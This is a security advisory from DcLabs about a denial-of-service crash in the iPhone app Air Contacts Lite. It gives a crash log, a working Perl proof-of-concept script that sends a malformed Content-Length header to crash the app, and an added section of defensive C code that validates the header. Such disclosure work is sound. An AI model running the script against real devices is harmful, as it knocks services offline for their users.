Air Contacts Lite Denial Of Service
Source: http://www.dclabs.com.br  Author: Escobar  Published: 2011-03-11
[Discussion]

- DcLabs Security Research Group advises about the following vulnerability(ies):

[Software]

- Air Contacts Lite (By i-NOVATiON GmbH)

[Vendor Product Description]

- Sharing contacts can't be easier. Wireless access to your iPhone
contacts from your Mac or PC.
This is the Lite Version of Air Contacts. If you want more features
please upgrade to the normal version.

Source: - http://itunes.apple.com/us/app/air-contacts-lite/id3084752

[Advisory Timeline]

- 01/26/2011 -> Advisory sent to vendor. (No response)
- 02/15/2011 -> Advisory sent again to vendor. (No response)
- 03/04/2011 -> Advisory published.

[Impact]

- Low

[Affected Version]

- Air Contacts Lite (Free Version)
- Paid version may also be vulnerable
- Prior versions may also be vulnerable

[Bug Description and Proof of Concept]

- When it receives crafted HTTP packets, the program does not handle the
invalid request: an uncaught NSException is raised, crashing the program.

<NSException>
Tue Jan 25 21:42:02 Program Name[23594] <Error>: *** Terminating app due to uncaught exception 'NSInvalidArgumentException', reason: '*** -[NSConcreteData initWithBytes:length:copy:freeWhenDone:bytesAreVM:]: absurd length: 4294967295, maximum size: 2147483648 bytes'
*** Call stack at first throw:
(
    0   CoreFoundation      0x3048e987 __exceptionPreprocess + 114
    1   libobjc.A.dylib     0x33a0849d objc_exception_throw + 24
    2   CoreFoundation      0x3048e7c9 +[NSException raise:format:arguments:] + 68
    3   CoreFoundation      0x3048e803 +[NSException raise:format:] + 34
    4   Foundation          0x302d2a51 -[NSConcreteData initWithBytes:length:copy:freeWhenDone:bytesAreVM:] + 108
    5   Foundation          0x302df845 -[NSData(NSData) initWithBytes:length:] + 36
    6   Foundation          0x302f224f +[NSData(NSData) dataWithBytes:length:] + 34
    7   Foundation          0x303216ab _performFileHandleSource + 722
    8   CoreFoundation      0x304447dd __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ + 12
    9   CoreFoundation      0x304165b7 __CFRunLoopDoSources0 + 382
    10  CoreFoundation      0x30415e5b __CFRunLoopRun + 230
    11  CoreFoundation      0x30415c87 CFRunLoopRunSpecific + 230
    12  CoreFoundation      0x30415b8f CFRunLoopRunInMode + 58
    13  GraphicsServices    0x31eec4ab GSEventRunModal + 114
    14  GraphicsServices    0x31eec557 GSEventRun + 62
    15  UIKit               0x313cf329 -[UIApplication _run] + 412
    16  UIKit               0x313cce93 UIApplicationMain + 670
    17  Program Name        0x00002f07 main + 42
    18  Program Name        0x00002ea4 start + 52
)
<END NSException>

[PoC]

#!/usr/bin/perl
# Air contacts Lite (Denial of Service)
use IO::Socket;

# Both <host> and <port> are required.
if (@ARGV < 2) {
    usage();
}
$ip   = $ARGV[0];
$port = $ARGV[1];
print "[+] Sending request...\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
print $socket "GET http://www.dclabs.com.br HTTP/1.1\r\n";
print $socket "Host: http://www.dclabs.com.br\r\n";
print $socket "Content-Length: 0\x78\x41\x71\x69\r\n\r\n";
sleep(2);
close($socket);
print "[+] Done!\n";

sub usage() {
    print "[-] DcLabs - Air Contacts Lite (DoS)\n\n";
    print "[-] Usage: <". $0 ."> <host> <port>\n";
    print "[-] Example: ". $0 ." 127.0.0.1 80\n";
    exit;
}

All flaws described here were discovered and researched by:
Rodrigo Escobar aka ipax.
DcLabs Security Research Group
ipax (at) dclabs <dot> com <dot> br

[Patch(s) / Workaround]

No patch(s) / workaround(s) were provided.
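
Added example (not part of the advisory and not the vendor's code): the PoC's Content-Length value decodes to "0xAqi", and the length in the crash log, 4294967295, is what -1 becomes as a 32-bit unsigned integer. The app's request handling is not shown in the advisory, so the C code below assumes a hypothetical embedded HTTP server and shows the two checks that keep such values from reaching a buffer constructor; `parse_content_length`, `checked_length` and `MAX_BODY_BYTES` are illustrative names.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical cap on request bodies for a small embedded HTTP server. */
#define MAX_BODY_BYTES (1u << 20)

/* Strictly parse a Content-Length value: decimal digits only, optional
 * surrounding spaces/tabs, no sign, no hex, no trailing junk, within the cap.
 * Returns 0 and stores the length on success, -1 if the request should be
 * rejected (for example with 400 Bad Request). */
int parse_content_length(const char *value, size_t *out)
{
    if (value == NULL || out == NULL) return -1;
    while (*value == ' ' || *value == '\t') value++;
    if (*value < '0' || *value > '9') return -1;   /* rejects "", "-1", "+5" */

    uint64_t n = 0;
    while (*value >= '0' && *value <= '9') {
        n = n * 10 + (uint64_t)(*value - '0');
        if (n > MAX_BODY_BYTES) return -1;         /* cap also prevents overflow */
        value++;
    }
    while (*value == ' ' || *value == '\t') value++;
    if (*value != '\0') return -1;                 /* rejects "0xAqi" */

    *out = (size_t)n;
    return 0;
}

/* Convert a signed byte count (for example a read() result or a computed
 * remainder) to a buffer length, refusing negative values instead of letting
 * -1 wrap to 4294967295 in a 32-bit unsigned type. */
int checked_length(long n, size_t *out)
{
    if (out == NULL || n < 0 || (unsigned long)n > MAX_BODY_BYTES) return -1;
    *out = (size_t)n;
    return 0;
}
```

A server using these checks answers the malformed request with an error response and closes the connection, rather than passing the length on to an allocation that throws.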

[Greetz]

DcLabs Security Research Group.

--
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br

 